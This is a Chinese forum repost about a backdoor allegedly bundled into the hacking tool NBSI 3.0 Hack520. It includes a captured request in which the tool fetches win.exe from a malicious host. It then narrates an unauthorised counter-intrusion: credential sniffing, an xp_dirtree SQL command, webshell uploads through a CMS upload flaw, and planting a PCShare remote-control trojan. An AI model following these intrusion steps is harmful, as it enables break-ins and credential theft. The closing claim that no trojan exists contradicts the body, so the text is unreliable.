信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

听说有马，不知道是真的不？

以下来自baidu快照。

用了NBSI 3.0 Hack520 增强版的请进来看!!!软件中被人        ★★★★


用了NBSI 3.0 Hack520 增强版的请进来看!!!软件中被人


作者：佚名 文章来源：不详 点击数： 更新时间：2006-7-13 17:46:14  



首先,BS一下放后门的人,事实上是谁捆了,我们几个人也已经该知道,也不想说了,他的人品大家都知道....
　　工具可以在黑鹰基地下载(http://www3.3800cc.com/Soft/gjgj/11115.html华北资源在线 ).下面的文章记录昨天我们(小刀,茶茶,小莫)反攻的全过程.
　　刚拿到工具那天我就开始抓包分析工具哪些变化,例如加了getwebshell功能.
　　抓包的时候,发现突然多了一条路径,向一个网站下载一个.exe文件,当时没在意,之后突然发现自己向外的
　　数据包很大,这个时候茶茶在群里说nbsi 3.0有后门,于是几个人开始渗透过来.
数据包:
GET /mp3/win.exe HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: www.6xwg.com
Connection: Keep-Alive

www.6xwg.com 也就是nbsi后门转向的站点.
　　我们几个人分工,两个对网段进行扫描,另外两个对主机进行旁入.
　　旁入拿shell很容易就拿下,过程略,后来又在同网段下拿了台sa的肉鸡,
　　tracert www.6xwg.com
　　直接返回IP说明可以嗅.
　　茶茶和刀刀两个负责嗅,而我继续旁入,服务器的权限配置BT,想通过旁注很难.
　　这时茶茶嗅到一堆dbo权限的mssql账号,还有一堆ftp账号和密码.

www.6xwg.com 又开了1433,直接本地连接.
exec master..xp_dirtree "d:/",1,1
　　从旁入的信息和分析得到路径,接着备份一个shell,但是备出来老出现%>无法毕合,又换备php小马.
　　但php小马又出现超时,再翻了翻他的路径,找到一个旧的动易程序,有上传漏洞,刚刚好上去.
　　接着到那个mp3目录下,发现了一堆网马,为了测试,我们配了一个pcshare,然后我们运行nbsi 3.0
　　刀刀告诉我,我们几个全部上线了,之后,我通知了xiaolu,还有一些好友,还包括中标的人(查后门中标的人).接着做了这个证明动画.
　　好了,不多说了,具体怎么想大家自己去想吧,这里再次BS捆后门的人.
　　请使用过此工具的人注意,最好重做系统吧,不知道那个pc有没有做过免杀!!!

以上软件并不存在木马.
鉴定完毕!

小竹的...